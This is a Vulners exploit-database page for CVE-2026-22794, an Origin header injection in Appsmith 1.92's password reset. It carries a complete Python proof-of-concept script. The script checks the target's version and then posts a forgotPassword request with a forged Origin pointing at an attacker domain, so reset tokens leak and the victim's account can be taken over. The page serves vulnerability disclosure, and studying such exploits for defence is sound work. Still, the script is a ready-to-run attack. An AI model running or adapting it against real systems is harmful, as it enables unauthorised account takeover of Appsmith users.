Vulners
Lucene search
📄 Appsmith 1.92 Origin Header Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for Origin Validation Error in Appsmith | 23 Jan 202615:10 | – | githubexploit |
 | CVE-2026-22794 | 12 Jan 202623:00 | – | circl |
 | Appsmith 访问控制错误漏洞 | 12 Jan 202600:00 | – | cnnvd |
 | CVE-2026-22794 | 12 Jan 202621:54 | – | cve |
 | CVE-2026-22794 Account Takeover Vulnerability in Appsmith | 12 Jan 202621:54 | – | cvelist |
 | EUVD-2026-1997 | 12 Jan 202621:54 | – | euvd |
 | CVE-2026-22794 | 12 Jan 202622:16 | – | nvd |
 | BIT-APPSMITH-2026-22794 Account Takeover Vulnerability in Appsmith | 14 Jan 202608:37 | – | osv |
| CVE-2026-22794 Account Takeover Vulnerability in Appsmith | 12 Jan 202621:54 | – | osv |
 | PT-2026-2309 | 12 Jan 202600:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : Appsmith 1.92 Origin Header Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.appsmith.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214539/ & CVE-2026-22794
[+] Summary : A critical vulnerability in Appsmith (versions 1.92) allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process.
Due to improper trust in client‑supplied headers, Appsmith constructs password reset links based on the injected origin. This enables an attacker to hijack password
reset tokens and perform full account takeover without authentication, simply by triggering a reset request for a known user email.
The issue affects the /api/v1/users/forgotPassword endpoint and can be exploited remotely.
[+] POC : python poc.py
#!/usr/bin/env python3
import argparse
import requests
import json
import re
def check_vulnerable(target_url):
headers = {
"User-Agent": "Mozilla/5.0 (compatible; ExploitPoC/1.0)"
}
try:
r = requests.get(
target_url.rstrip('/') + "/",
headers=headers,
timeout=10,
verify=False
)
if r.status_code == 200 and "Appsmith" in r.text:
version_match = re.search(
r"parseConfig\('v([0-9]+\.[0-9]+)'\)",
r.text
)
if version_match:
try:
version = float(version_match.group(1))
except ValueError:
print("[?] Version parsing failed - assuming vulnerable")
return True
if version <= 1.92:
print(f"[+] Target is vulnerable! Version: v{version}")
return True
else:
print(f"[-] Target is patched (version: v{version})")
return False
else:
print("[?] Version not found - assuming vulnerable if Appsmith detected")
return True
else:
print("[-] Not an Appsmith instance or unreachable")
return False
except Exception as e:
print(f"[-] Error checking: {e}")
return False
def exploit(target_url, email, evil_domain):
vuln_path = "/api/v1/users/forgotPassword"
headers = {
"Origin": f"https://{evil_domain}",
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (compatible; ExploitPoC/1.0)"
}
payload = {
"email": email
}
full_url = f"{target_url.rstrip('/')}{vuln_path}"
print(f"[*] Sending malicious reset request to: {full_url}")
print(f"[*] Target email: {email}")
print(f"[*] Injected Origin: https://{evil_domain}")
try:
r = requests.post(
full_url,
headers=headers,
json=payload,
timeout=10,
verify=False
)
if r.status_code in [200, 201, 202] and "success" in r.text.lower():
print(f"[+] Exploit succeeded! Status: {r.status_code}")
print(
f"[+] Check email for reset link — it should point to your evil domain "
f"(e.g., https://{evil_domain}/... )"
)
print("[+] If user clicks, token leaks to your server → takeover account.")
if r.text.strip():
try:
print("\nResponse body:\n" + "-" * 60)
print(json.dumps(r.json(), indent=4))
print("-" * 60)
except Exception:
print("[!] Response is not valid JSON")
else:
print(f"[-] Failed - Status: {r.status_code} (may be patched or invalid email)")
print(r.text[:500])
except Exception as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="CVE-2026-22794 PoC - Appsmith Origin Injection by indoushka"
)
parser.add_argument(
"--target",
required=True,
help="Target Appsmith URL (e.g. https://appsmith.target.com)"
)
parser.add_argument(
"--email",
help="Target user email (e.g. [email protected]) - required for exploit"
)
parser.add_argument(
"--evil_domain",
help="Your attacker domain (e.g. evil.com) - required for exploit"
)
parser.add_argument(
"--check",
action="store_true",
help="Check if vulnerable without exploiting"
)
args = parser.parse_args()
if args.check:
check_vulnerable(args.target)
else:
if not args.email or not args.evil_domain:
parser.error("--email and --evil_domain are required for exploitation")
exploit(args.target, args.email, args.evil_domain)
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Feb 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.18.8 - 9.6
EPSS0.00019
SSVC